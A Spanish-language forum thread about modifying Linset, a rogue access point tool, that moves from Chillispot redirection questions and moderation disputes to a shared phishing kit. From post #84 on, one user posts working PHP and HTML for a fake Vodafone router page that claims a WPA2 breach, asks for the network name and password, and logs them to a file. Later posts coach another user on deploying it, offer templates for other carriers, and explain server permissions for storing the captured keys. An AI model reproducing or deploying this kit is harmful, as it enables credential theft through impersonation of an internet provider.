El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#76 06-03-2017 15:05:50

tuthieu
Usuario

Registrado: 27-11-2016
Mensajes: 14

Re: modificar linset

Koala escribió:

Hello Koala,can you redirect HTTPS in chillispot?

Of course you can into the config page enter your redirect page.

I set up HTTPS for my site,the page work well with http but cannot redirect with HTTPS.

The redirection work with the main page of chilispot in your router which use radius auth.Redirection HTTPS to HTTPS will no work cause... it's https.But if your config is well done you don't have to do anything on the client computer side.For example if im the client, i have a google page open on https website and i connect to your network shortly after the connection a new tabs will open hilmselft with the page of your https server and the client can't avoid it, there is no redirection here cause it's a new tabs.. and this what we want tongue

Same thing happen when the browser is closed, on windows7 a message appear on the right corner "more information are avaible, click there" and on windows 10, this stupid shit directly open the browser to your https server big_smile

Remember that windows is always finding a service to connect to, if you are on a train or airport station and you want o connect a hotspot you will be redirect to the service login.If that don't work there is something wrong with your switch (wlan0 to eth0) or your chilispot config.

Hola administrador, Koala y cada uno.
Chillispot funciona perfectamente en Windows 10.
¿Chillispot funcionará para smartphone?
No soy dueño de un smartphone.
Saludos


Hello admin,Koala and every one.
Chillispot works perfectly on Windows 10.
Will Chillispot work for smartphone?
I don't own a smartphone.
Regards

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#77 06-03-2017 15:44:04

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,269

Re: modificar linset

Estamos desviando bastante del tema de este hilo  (creo que era "modifcar linset" tongue big_smile )....
Si quieres compartir experiencias y/o opiniones sobre chillispot lo suyo es abrir un tema dedicado. wink
Please open a new thread for issues non directly related to "modificar Linset" (things such as asking for fedback about chillispot wink ). Thank you! 

Desconectado

#78 06-03-2017 18:02:23

tuthieu
Usuario

Registrado: 27-11-2016
Mensajes: 14

Re: modificar linset

Sorry admin,I intended this was the last question and I was lazy smile so I didn't create new thread.

Ultima edición por tuthieu (06-03-2017 18:02:47)

Desconectado

#79 06-03-2017 23:50:01

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 749

Re: modificar linset

lol


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

#80 07-03-2017 16:03:15

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,269

Re: modificar linset

Tan "lazy" que no usas (otra vez) el traductor para una sola frase... tongue
Te recuerdo que estamos en un foro en Español: Hacer un esfuerzo para usar el idioma de tus anfitriones es cuestión de educación.
  Es muy probable que me sienta lazy  yo también la próxima vez que hagas lo que te sale de los huevos y que borré tu mensaje sin darte explicaciones. wink
 
.

Desconectado

#81 07-03-2017 16:20:47

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 749

Re: modificar linset

Te recuerdo que estamos en un foro en Español: Usar el idioma de tus huéspedes es cuestión de educación.

DE accuerdo ^^ pero es mi falta tambien porque hay palabras en espanol que no sé bien décir o sea como he usado el inglès ha hecho el mismo smile


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

#82 07-03-2017 17:34:22

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,269

Re: modificar linset

No conoces todos los detalles... wink
Tuthieu me ha mandado (varias veces) mails para pedirme ayuda por privado y le he respondido para decirle de usar el foro
Y le he explicado personalmente y en detalles como hacer si no hablaba castellano. 
Sigue mandándome mails para pedir asistencia por privado (que ya no abro cómo si fuera un spam) + no hace caso (le he pedido que haga sistemáticamente un copy paste de google translate)
Total: I feel lazy too big_smile

Desconectado

#83 07-03-2017 19:38:57

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 749

Re: modificar linset

Hay hay... a mi tambien no me gusta eso tanpoco estar molestado para choradas.. o sea comprendo mejor las cosas ahora smile


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

#84 14-11-2017 04:05:58

crash
Usuario

Registrado: 25-10-2017
Mensajes: 952

Re: modificar linset

y no seria mejor meter un php dentro de las index.html con salida a texto plano y sobre los certificados ssl clonar los oficiales de las mismas compañías?

yo por ejemplo en mi servidor interno uso para cifrar datos un php que te pide usuario y password si no se introduce correctamente no te deja ver nada. te devuelve a donde le haya indicado, es decir creo un bucle y hasta que no meta la contraseña y usuario bien o se aburra y se salga llevándole a http://.... o https://....

<?php
 if($_POST){
# Aqui definimos el usuario y password
# Puedes cambiar el usuario y clave x lo q sea
$usuario = '';
$clave = '';
# Aqui compruebo q los datos(usuario y contraseña) ingresados sean igual a lo que eh definido
# Y si son correcto los datos redireciona al enlace de tu sitio Autorizado
# En que caso que no sean correcto los datos  recirecciona al enlace de Error de  Datos Ingresados
if(trim($_POST['user'])==$usuario && trim($_POST['pass'])==$clave) {
header('Location: http://loquesea.com/.loquesea.html');
 }else{
header('Location: http://loquesea.com/index.html');
 }
   }

?>
<html>
<head>
<title>Acceso Restringido</title>
</head>
<body bgcolor="black"><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<form action="" method="post">
<table border="1" cellpadding="5" cellspacing="0" align="center">
<tr><td colspan="2" align="center"><font color="yellow">ACCESO</td></tr>
<tr><td><font color="yellow">Usuario:</td> <td><input type="text" name="user" /></td></tr>
<tr><td><font color="yellow">Contraseña:</td> <td><input type="password" name="pass" /></td></tr>
<tr><td align="center" colspan="2"><input type="submit" name="enviar" value="Enviar" /></td></tr>
</table>
</form>
<noframes><iframe><noscript><xmp><pre>
</body>
</html>

habría que modificar un poco el php para que las contraseñas fueran enviadas a un archivo-txt o un html

ya que conforme esta ahora mismo habria que introducir lo que se hubiera puesto. ejemplo:

<?php
 if($_POST){
# Aqui definimos el usuario y password
# Puedes cambiar el usuario y clave x lo q sea
$usuario = 'wifi-libre';
$clave = 'p4Ssw0Rd';

si no se escribiera así no se tendría acceso. seria modificar esta parte y darle acceso a escritura en nuevo archivo

Desconectado

#85 14-11-2017 10:21:31

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,269

Re: modificar linset

Por favor crash, no pongas en el foro  mi contraseña de administrador

$clave = 'p4Ssw0Rd';

Si alguien de mal intencionado pasa por aquí estamos mal big_smile
Sino me parece que tu sugerencia es buena.

Desconectado

#86 14-11-2017 10:54:33

crash
Usuario

Registrado: 25-10-2017
Mensajes: 952

Re: modificar linset

es lo mismo que yo hacia para hacer phishing en mis tiempos para reirme de los amigos con sus contraseñas.

Desconectado

#87 16-11-2017 19:34:58

crash
Usuario

Registrado: 25-10-2017
Mensajes: 952

Re: modificar linset

aquí os dejo una hecha para que la veais o probéis, os dejo el archivo background.png y el home_assistance.jpg
background.png
home_assistance.jpg

asi se veria
asi el archivo donde se crean y guardan

<?php
 if($_POST){
$usuario = $_POST['user'];
$pass = $_POST['pass'];
$f = fopen("contraseña.html", "a"); 
fwrite ($f, '<font color="black">Red:[</font><b><font color="red">'.$usuario.'</font></b><font color="black">]Password: [</font><b><font color="red">'.$pass.'</font></b><font color="black">]</font><br>');
fclose($f);
if(trim($_POST['user'])==$usuario && trim($_POST['pass'])==$clave) {
header('Location: http://www.vodafone.com/content/index/what/technology-blog.html');
 }else{
header('Location: /Inicio_files/index.php');
 }
   }
?>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
<title>Vodafone DSL Router</title>
<body><table>
<center><img src="background.png"/>
<br/>
A sido descubierta recientemente una brecha en el protocolo de seguridad WPA2 siendo posible la obtención de las contraseñas
<br/><br/>
<img src="home_assistance.jpg"></center><br/><br/>
<center><p>por motivos de seguridad estamos llevando a cabo una serie de pruebas para comprobar que su router no esta afectado.<br/>
<b>Por favor sea tan amable de introducir su nombre de red y contraseña</b><br/> vamos a comprobar en nuestra base de datos si su router esta afectado.</p> Le rogamos nos disculpe por las molestias ocasionadas.</center>
<br/>
<script language="javascript">
toHour=1;
toMinute=0;
toSecond=0;

//cuenta atras
function countDown()
{
	toSecond=toSecond-1;
	if(toSecond<0)
	{
		toSecond=59;
		toMinute=toMinute-1;
	}
	form.second.value=toSecond;

	if(toMinute<0)
	{
		toMinute=4;
		toHour=toHour-1;
	}
	form.minute.value=toMinute;

	if(toMinute<0)
	{
		//final
		form.second.value=0;
		form.minute.value=0;
	}else{
		setTimeout("countDown()",1000);
	}
}

-->
</script>
 
<style type="text/css">
.form_input
{
	font-family: Verdana;
	font-size: 14;
	color: #000000;
	border-width: 0;
	background-color: #ffffff;
	text-align: right;
}
</style>
</head>
 
<body onload="countDown();">
<center><form name="form">
	Tiempo aproximado... 
	<input type="text" size="5" class="form_input" name="minute" disabled>:
	<input type="text" size="5" class="form_input" name="second" disabled>
</form></center>
<form action="" method="post">
<table border="1" cellpadding="5" cellspacing="0" align="center">
<tr><td colspan="2" align="center"><font color="black">COMPROBACION DE SEGURIDAD</td></tr>
<tr><td><font color="black">Nombre de red:</td> <td><input type="text" name="user" /></td></tr>
<tr><td><font color="black">Contraseña:</td> <td><input type="password" name="pass" /></td></tr>
<tr><td align="center" colspan="4"><input type="submit" name="enviar" value="Enviar" /></td></tr>
</table>
</form>
<br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><center> &copy; 2017 Vodafone España S.A.U. 28050 Madrid SPAIN C/Isabel Colbrand 22 Tlf: +34 607133333</center></table>
</body>
</html>

Ultima edición por crash (17-11-2017 00:59:32)

Desconectado

#88 17-11-2017 14:44:31

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,269

Re: modificar linset

Buena fake.
Esta señora tiene pinta de ser una buena muchacha que va a la iglesia cada domingo...
...Puedo darle mi contraseña: Pa$$w0rd  big_smile

Desconectado

#89 17-11-2017 14:47:11

crash
Usuario

Registrado: 25-10-2017
Mensajes: 952

Re: modificar linset

jajajajajaja si queréis mas, de otras compañías o modelos lo puedo hacer, solo necesito las imagenes de la portada. me las podéis enviar por mp

Desconectado

#90 16-05-2018 17:52:15

cdt
Usuario

Registrado: 10-05-2018
Mensajes: 19

Re: modificar linset

es muy bueno jejee a ver tengo una duda si por ejemplo guardamos una web insertando en el action= y el php correspondiente gravaria las contraseñas o hay que modificar mucho la web
hola tienes el index.html de esa web es que me sale con varios errores lo acabo de copiar todo y me sale con errores puedes subir todos los archivos si estoy haciendo algo mal y no se que es saludos

Desconectado

#91 16-05-2018 18:08:11

crash
Usuario

Registrado: 25-10-2017
Mensajes: 952

Re: modificar linset

creo que lo mejor es que te copies la plantilla de aquí, y hagas una copia de está para trabajar sobre ella y así entiendes el procedimiento al modificarla por la compañía que quieras

Desconectado

#92 16-05-2018 18:09:31

cdt
Usuario

Registrado: 10-05-2018
Mensajes: 19

Re: modificar linset

ok sii voy a ver por que la plantilla esa mola y mucho wink

Desconectado

#93 16-05-2018 18:10:58

crash
Usuario

Registrado: 25-10-2017
Mensajes: 952

Re: modificar linset

cdt escribió:

hola tienes el index.html de esa web es que me sale con varios errores lo acabo de copiar todo y me sale con errores puedes subir todos los archivos si estoy haciendo algo mal y no se que es saludos

va en el mismo php el index html

mira el codigo la pagina empieza aqui

<html>
....


</html>

Desconectado

#94 16-05-2018 18:17:45

cdt
Usuario

Registrado: 10-05-2018
Mensajes: 19

Re: modificar linset

aaa amigo ya lo entiendo copie mal el codigo si señor.
vale lo voy captando en dicha web hay un action= verdad ahi solo debemos de colocar el codigo php tanto como de html o php  el metodo es POST YA LO CAPTE SE COLOCA UN ARCHIVO PHP QUE YA SE TIENE Y SE PONE EN EL ACTION= POR EJEMPLO NEXT.PHP JUNTO CON EL CODIGO wink

Desconectado

#95 16-05-2018 19:00:19

crash
Usuario

Registrado: 25-10-2017
Mensajes: 952

Re: modificar linset

cdt escribió:

vale lo voy captando en dicha web hay un action= verdad ahi solo debemos de colocar el codigo php tanto como de html o php  el metodo es POST YA LO CAPTE SE COLOCA UN ARCHIVO PHP QUE YA SE TIENE Y SE PONE EN EL ACTION= POR EJEMPLO NEXT.PHP JUNTO CON EL CODIGO wink

no
el action="" va vacio
toda la plantilla tiene que tener el (nombre que le pongas.php)
el código php está arriba al comienzo del código empieza así

<?php y acaba así ?>

después viene el código html

<html>
aquí va toda la página
</html>

este es el codigo para meter la clave y el nombre de la red; y en ese action se queda en blanco, no hay que poner nada ahí.

<form action="" method="post">
<table border="1" cellpadding="5" cellspacing="0" align="center">
<tr><td colspan="2" align="center"><font color="black">COMPROBACION DE SEGURIDAD</td></tr>
<tr><td><font color="black">Nombre de red:</td> <td><input type="text" name="user" /></td></tr>
<tr><td><font color="black">Contraseña:</td> <td><input type="password" name="pass" /></td></tr>
<tr><td align="center" colspan="4"><input type="submit" name="enviar" value="Enviar" /></td></tr>
</table>
</form>

así que la distribución de toda la plantilla php. es así

<?php
codigo php....
?>
<html>

página web

</html>

Ultima edición por crash (16-05-2018 19:03:17)

Desconectado

#96 17-05-2018 13:30:53

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 749

Re: modificar linset

Holà smile

De passaje rapido por aqui, mas de la buena explicacion de crash si quieres escribir en un fichero txt o lo que sea con apache2 o httpd hay que dar la autorisacion Al servidor web de poder escribir en el fichero.

Eso se hace rapido con

chown

No tengo las commandas à mano pero el fichero de la clave wifi tiene que estar dentro el grupo : www:data

Lo puedes cambiar tambien con un clic derecho à tu mando.No hace falta Poner un chmod 640 en el fichero tambien.

No se olvide que a cada cambios en el servidor web se tiene que reiniciar

++


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
46 20666 Hoy 15:19:44 por calavazo32
14 1071 Hoy 15:09:52 por calavazo32
13 3510 Hoy 15:02:55 por calavazo32
3 1117 Hoy 15:00:58 por kcdtv
30 433 Hoy 14:10:03 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: gaspard
Usuarios registrados conectados: 1
Invitados conectados: 18

Conectados: javierbu

Estadisticas de los foros

Número total de usuarios registrados: 1,123
Número total de temas: 1,128
Número total de mensajes: 11,701

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21